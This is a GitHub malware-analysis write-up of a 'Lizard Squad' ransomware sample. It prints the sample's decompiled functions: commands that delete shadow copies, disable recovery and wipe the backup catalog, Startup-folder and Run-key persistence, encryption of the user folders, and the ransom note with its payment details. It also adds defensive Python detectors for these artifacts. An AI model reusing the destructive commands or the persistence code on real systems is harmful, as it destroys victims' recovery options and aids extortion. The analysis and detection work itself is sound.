ihl7/Lizard-Squad-Ransomware
Analysis of a Lizard Squad Ransomware Sample

Source: Twitter

Hello everyone. Today we will analyse a ransomware sample that I found in a tweet on Twitter.

Let's dive into it.

Functions

Delete Shadow Copies

It executes this command:
    "vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
to delete the Volume Shadow Copies, so the victim cannot restore earlier versions of the files from them.
Code:
' Deletes every Volume Shadow Copy, first with vssadmin and then again through WMI,
' chained in a single shell command.
Private Shared Sub DeleteShadowCopies()
    Program.runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete")
End Sub

Disable Recovery Mode

It executes this command:
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
to disable recovery mode: after this the victim cannot use the Windows Recovery Environment to repair the system.
Code:
' Tells the boot loader to ignore boot failures and disables the recovery
' environment for the default boot entry.
Private Shared Sub DisableRecoveryMode()
    Program.runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no")
End Sub

Delete Backup Catalog

It executes this command:
    "wbadmin delete catalog -quiet"
to delete the Windows Backup catalog.
Code:
' Removes the Windows Backup catalog without prompting. The write-up listed this
' sub under the same name as the previous one; it is named here after its purpose.
Private Shared Sub DeleteBackupCatalog()
    Program.runCommand("wbadmin delete catalog -quiet")
End Sub
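The three command chains above (shadow copy deletion, recovery mode, backup catalog) are exactly what a defender wants to catch in process-creation telemetry, and the "&" chaining means a single event carries several behaviours. The Python below is an added example written for this write-up, not code from the sample or from this repository: it splits a command line on the cmd chain operators, matches each sub-command against one signature per behaviour, and runs over a few constructed log lines. The pipe-separated event format and the assumption that Program.runCommand hands the chain to "cmd.exe /c" are mine; adapt the parsing to whatever your EDR or Sysmon pipeline emits.

```python
"""Flag the recovery-inhibition command chains seen in this sample in process-creation
log lines. Added example for this write-up (not the sample's code); log lines are constructed."""
import re

# One entry per behaviour described above; each regex is matched against a single
# sub-command of a cmd chain, case-insensitively.
SIGNATURES = [
    ("shadow copy deletion",
     re.compile(r"^vssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow copy deletion",
     re.compile(r"^wmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("boot failure recovery suppressed",
     re.compile(r"^bcdedit(\.exe)?\s+/set\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("recovery environment disabled",
     re.compile(r"^bcdedit(\.exe)?\s+/set\b.*\brecoveryenabled\s+no\b", re.I)),
    ("backup catalog deletion",
     re.compile(r"^wbadmin(\.exe)?\s+delete\s+catalog\b", re.I)),
]

# Leading "cmd.exe /c " (optionally quoted, optionally with a full path); assumed to be
# what Program.runCommand prepends when it hands the chain to the shell.
CMD_WRAPPER = re.compile(r'^"?(?:[^"]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s+')


def split_subcommands(cmdline):
    """Strip the cmd /c wrapper and split a chain on '&' / '&&' into its sub-commands."""
    cmd = cmdline.strip()
    m = CMD_WRAPPER.match(cmd)
    if m:
        cmd = cmd[m.end():]
    cmd = cmd.strip('"')
    return [p.strip() for p in re.split(r"\s*&&?\s*", cmd) if p.strip()]


def classify(cmdline):
    """Return the behaviour labels found in a command line (deduplicated, first-match order)."""
    hits = []
    for sub in split_subcommands(cmdline):
        for label, rx in SIGNATURES:
            if rx.search(sub) and label not in hits:
                hits.append(label)
    return hits


# Constructed process-creation events: timestamp|pid|image|command line.
SAMPLE_LOG = [
    "2024-01-01T10:00:01|4120|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete",
    "2024-01-01T10:00:02|4130|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures "
    "& bcdedit /set {default} recoveryenabled no",
    "2024-01-01T10:00:03|4140|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c wbadmin delete catalog -quiet",
    "2024-01-01T10:00:04|4150|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c vssadmin list shadows",  # benign admin query, must not alert
]


def scan(lines):
    """Return one alert per event whose command line contains a flagged sub-command."""
    alerts = []
    for line in lines:
        ts, pid, image, cmdline = line.split("|", 3)
        hits = classify(cmdline)
        if hits:
            alerts.append({"time": ts, "pid": int(pid), "image": image, "behaviours": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["pid"], ", ".join(alert["behaviours"]))
```

Splitting on the chain operators before matching matters: a rule anchored on the whole command line would miss the second half of each chain, and a plain substring search on "vssadmin" would fire on the harmless "vssadmin list shadows" in the last event.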

Add Link To Startup

Creates a .url (Internet Shortcut) file in the user's Startup folder that points back at the ransomware executable, so it is launched again at every logon (persistence).
Code:
' Needs Imports System, System.IO, System.Diagnostics and System.Reflection.
' Writes an Internet Shortcut named after the running process into the user's
' Startup folder; its URL= line is a file:/// URL of this executable.
Private Shared Sub AddLinkToStartup()
    Dim folderPath As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    Dim str As String = Process.GetCurrentProcess().ProcessName
    Using streamWriter As StreamWriter = New StreamWriter(folderPath + "\" + str + ".url")
        Dim location As String = Assembly.GetExecutingAssembly().Location
        streamWriter.WriteLine("[InternetShortcut]")
        streamWriter.WriteLine("URL=file:///" + location)   ' launch target
        streamWriter.WriteLine("iconIndex=0")
        Dim str2 As String = location.Replace("\"c, "/"c)   ' forward slashes for IconFile
        streamWriter.WriteLine("IconFile=" + str2)
    End Using
End Sub

Registry Startup

Sets a value named "Microsoft Store" whose data is the ransomware's path under the key:
    "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
as a second persistence mechanism.
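Both persistence mechanisms above leave artifacts that can be inspected on disk and in the registry: a .url file in the Startup folder whose URL= line is a file:/// URL of a local executable, and a Run-key value (here named "Microsoft Store") whose data is the same path. The Python below is an added example, not part of the sample or of this repository: it parses the [InternetShortcut] layout that AddLinkToStartup writes, resolves file:/// URLs to Windows paths, and cross-checks Run-key values against the shortcut targets. The shortcut contents, the Run-key values and the path C:\Users\victim\Downloads\Sample.exe are constructed; a real audit would enumerate the Startup folder and read HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run instead of the embedded dictionaries.

```python
"""Audit the two persistence artifacts described above: a .url shortcut in the Startup
folder that launches a local executable, and a Run-key value pointing at the same path.
Added example for this write-up (not the sample's code); all data below is constructed."""
import os
import re
from urllib.parse import unquote

EXEC_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}


def parse_internet_shortcut(text):
    """Parse the INI-style [InternetShortcut] file the sample writes into a dict
    (keys lower-cased); lines outside that section are ignored."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def file_url_to_path(url):
    """Turn file:///C:\\dir\\x.exe (or file://host/C:/dir/x.exe) into a Windows path;
    return None for any other scheme."""
    m = re.match(r"^file:(?://[^/\\]*)?[/\\]?(.*)$", url, re.I)
    if not m:
        return None
    return unquote(m.group(1)).replace("/", "\\")


def assess_shortcut(name, text):
    """Return a finding if the shortcut's URL= target is a local executable, else None."""
    fields = parse_internet_shortcut(text)
    target = file_url_to_path(fields.get("url", ""))
    if target and os.path.splitext(target)[1].lower() in EXEC_EXTENSIONS:
        return {"shortcut": name, "target": target, "icon": fields.get("iconfile")}
    return None


def exe_from_command(data):
    """Extract the program path from Run-key value data (quoted path or first token)."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def audit(startup_files, run_values):
    """Cross-check Startup-folder shortcuts against Run-key values; return findings."""
    findings, targets = [], set()
    for name, text in startup_files.items():
        f = assess_shortcut(name, text)
        if f:
            findings.append(("startup shortcut launches executable", f))
            targets.add(f["target"].lower())
    for name, data in run_values.items():
        exe = exe_from_command(data)
        reasons = []
        if exe.lower() in targets:
            reasons.append("same executable as a startup shortcut")
        if "\\users\\" in exe.lower():
            reasons.append("executable lives under a user profile, not Program Files")
        if reasons:
            findings.append(("run key value", {"name": name, "exe": exe, "reasons": reasons}))
    return findings


# Constructed Startup-folder contents, in the exact layout AddLinkToStartup writes.
SAMPLE_STARTUP = {
    "Sample.url": "[InternetShortcut]\r\nURL=file:///C:\\Users\\victim\\Downloads\\Sample.exe\r\n"
                  "iconIndex=0\r\nIconFile=C:/Users/victim/Downloads/Sample.exe\r\n",
    "Docs.url": "[InternetShortcut]\r\nURL=https://docs.example.test/\r\n",
}

# Constructed HKCU\...\Run values; "Microsoft Store" mirrors the value name the sample uses.
SAMPLE_RUN = {
    "Microsoft Store": "C:\\Users\\victim\\Downloads\\Sample.exe",
    "OneDrive": '"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe" /background',
}

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_STARTUP, SAMPLE_RUN):
        print(kind, detail)
```

The .url route is worth checking explicitly because many startup audits only look for .lnk files and Run values; a shortcut whose URL= is a file:/// URL of an executable is launched by the shell just like a .lnk would be.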

Look For Directories

This function builds the paths of the following directories under the user's profile directory and encrypts each of them.
The directory names are stored as strings appended to the user's main directory:
  • Desktop
  • Links
  • Contacts
  • Documents
  • Downloads
  • Pictures
  • Music
  • OneDrive
  • Saved Games
  • Favorites
  • Searches
  • Videos
Code:
' Each target directory is built as userDir + userName + "\<folder>" and passed to
' encryptDirectory one by one. Note that "\Desktop" appears twice (location and location4).
Dim location As String = Program.userDir + Program.userName + "\Desktop"
Dim location2 As String = Program.userDir + Program.userName + "\Links"
Dim location3 As String = Program.userDir + Program.userName + "\Contacts"
Dim location4 As String = Program.userDir + Program.userName + "\Desktop"
Dim location5 As String = Program.userDir + Program.userName + "\Documents"
Dim location6 As String = Program.userDir + Program.userName + "\Downloads"
Dim location7 As String = Program.userDir + Program.userName + "\Pictures"
Dim location8 As String = Program.userDir + Program.userName + "\Music"
Dim location9 As String = Program.userDir + Program.userName + "\OneDrive"
Dim location10 As String = Program.userDir + Program.userName + "\Saved Games"
Dim location11 As String = Program.userDir + Program.userName + "\Favorites"
Dim location12 As String = Program.userDir + Program.userName + "\Searches"
Dim location13 As String = Program.userDir + Program.userName + "\Videos"
Program.encryptDirectory(location)
Program.encryptDirectory(location2)
Program.encryptDirectory(location3)
Program.encryptDirectory(location4)
Program.encryptDirectory(location5)
Program.encryptDirectory(location6)
Program.encryptDirectory(location7)
Program.encryptDirectory(location8)
Program.encryptDirectory(location9)
Program.encryptDirectory(location10)
Program.encryptDirectory(location11)
Program.encryptDirectory(location12)
Program.encryptDirectory(location13)
Dumb! This could have been done with a For loop.

Set Wallpaper

This function changes the desktop wallpaper to this image:

[wallpaper image not reproduced here]

Code:
' Decodes the embedded base64 JPEG to a randomly named file in %TEMP% and sets it as the
' desktop wallpaper through SystemParametersInfo(SPI_SETDESKWALLPAPER = 20, 0, path,
' SPIF_UPDATEINIFILE = 1). Any error is swallowed.
Public Shared Sub SetWallpaper(base64 As String)
    If base64 <> "" Then
        Try
            Dim text As String = Path.GetTempPath() + Program.RandomString(9) + ".jpg"
            File.WriteAllBytes(text, Convert.FromBase64String(base64))
            Program.SystemParametersInfo(20UI, 0UI, text, 1UI)
        Catch
            ' bad base64 or a write failure is silently ignored
        End Try
    End If
End Sub

Add And Open Note

This function writes the ransom message for the victim to a file named "說明it.txt" and opens it.
The message:
"我來自一個名為:蜥蜴小隊的國際組織", "我們是黑客組織", "我的名字是:09先生", "我會用你的電腦作為收款的抵押品", "", "請支付:USDT-TRC20", "金額:2000", "付款地址:TRZRAM9KL5qv1BMrXxo876wetHfzT19sii", "聯繫方式 :[email protected]", "電報:@woo090909", "付款後聯繫我,我會為你解鎖", "如果您不付款,您的計算機和文件將被自動銷毀,", "如果你真的想解決,請隨時支付費用,聯繫我,我會考慮給你打折", 
"I'm from an international organization called: Lizard Squad , we are a hacker group , My name is: Mr. 09 , I will use your computer as collateral for collection , Please pay: USDT-TRC20 , Amount: 2000 , Payment address: TRZRAM9KL5qv1BMrXxo876wetHfzT19sii , contact details : [email protected] , telegraph: @woo090909 , Contact me after payment and I will unlock it for you , If you do not pay, your computer and files will be automatically destroyed , If you really want a fix, feel free to pay the fee, contact me and I'll consider giving you a discount" 

Hmm, the name of the group looks familiar: https://en.wikipedia.org/wiki/Lizard_Squad

It seems to me that this ransomware was produced with a ransomware builder: in the source code I found functions that this sample never calls, and settings strings that are never used.

Special thanks to @github/s4o @github/ihl7 @github/rayiilz
